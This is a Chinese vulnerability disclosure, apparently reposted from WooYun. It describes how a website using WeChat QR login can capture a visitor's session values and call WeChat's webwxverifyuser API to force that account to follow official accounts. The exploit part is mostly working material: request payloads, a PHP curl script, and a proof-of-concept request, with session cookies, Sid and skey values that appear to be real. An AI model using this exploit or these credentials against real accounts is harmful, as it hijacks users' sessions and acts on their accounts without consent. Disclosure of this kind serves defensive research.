神刀安全网

微信强制用户关注公众号

简要描述:

微信强制用户关注公众号

详细说明:

微信设计错误,可导致用户强制关注公众号

漏洞内容:

第一步测试 登陆微信网页版

之后转发一个微信公众号关注链接过来

找到接口 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser

之后点击加好友没有用

发现还是有参数传递的

强制关注如下,只要发送下面参数就可以了

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号加密值)","VerifyUserTicket":"(公众号加密值)"}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}

(用户值) 全部都可以通过 微信扫描登录获取到,只要你扫描登录我网站就能让这个微信号强制关注公众号

(公众号加密值)这个接口获取 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(微信的用户值)&skey=(微信的用户值)

最后测试发现 https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(微信用户值),"Sid":"(微信用户值)","Skey":"(微信用户值)","DeviceID":"(微信用户值)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(公众号的微信号)","VerifyUserTicket":""}],"VerifyContent":"我是(用户名)","SceneListCount":10,"SceneList":[33],"skey":"(用户值)"}

强制关注条件如下 1.扫描登录我网站 2.知道要强制关注公众号的微信号

用户值获取再强调一遍,网站接入微信扫描登录即可拿到,上面的用户值,确实有这个漏洞

我经过测试一天,大概可以让一个微信号强制关注20个左右

$header = array (

'Host: wx2.qq.com',

'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',

'Accept: application/json, text/plain, */*',

'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

'Accept-Encoding: gzip, deflate',

'DNT: 1',

'Content-Type: application/json;charset=utf-8',

'Referer: https://wx2.qq.com/',

'Cookie: wxuin=2330616138; webwxuvid=cab5317930f5335a8994ade9a8160d9a0c1e843e1bd24ff03ab254c91d4ea3a8ec31a98c8d9adb6087cf6e9043d53c58; pgv_pvi=3286183936; pgv_pvid=8255006950; pgv_info=ssid=s2371423939; pgv_si=s1581726720; wxsid=hBgpWPQeDRDVm3Rc; wxloadtime=1444359620_expired; mm_lang=zh_CN; webwx_data_ticket=AQaRtHUZKZBvZZR2FeXCn5pg; MM_WX_NOTIFY_STATE=1; MM_WX_SOUND_STATE=1; wxpluginkey=1444352949',

'Connection: keep-alive',

);

$data='{"BaseRequest":{"Uin":2330616138,"Sid":"hBgpWPQeDRDVm3Rc","Skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4","DeviceID":"e589828811516427"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"VerifyContent":"我是123456789","SceneListCount":1,"SceneList":[33],"skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4"}';

$ch = curl_init("http://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444361009023");

curl_setopt($ch, CURLOPT_HTTPHEADER, $header);

curl_setopt($ch, CURLOPT_HEADER, 1);

curl_setopt ( $ch, CURLOPT_POST, 1 );

curl_setopt ( $ch, CURLOPT_POSTFIELDS, $data );

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$b=curl_exec($ch);

curl_close($ch);

上面的是php代码,里面的用户值,你扫描登录微信网页版,你手动抓上去,运行就可以了

这个补充够充分了吧!!!代码都发你了,图片我截图不了给你,视频倒是可以,我懒得拍

漏洞证明:

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300

{"BaseRequest":{"Uin":2330616138,"Sid":"Ix4w3k0gAVg1T5SW","Skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296","DeviceID":"e426131629909286"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"@888d1b21d2fe80dafe922ed50723874b","VerifyUserTicket":"v1_92c7ceebbd2a799f06c7e5f97fd352c5c040d63b8c40ec055b6968f5068860d3@stranger"}],"VerifyContent":"我是123456789","SceneListCount":10,"SceneList":[33],"skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296"}

修复方案:

微信有大神不瞎说了

版权声明:神刀安全网转自 莫里@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 微信强制用户关注公众号

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮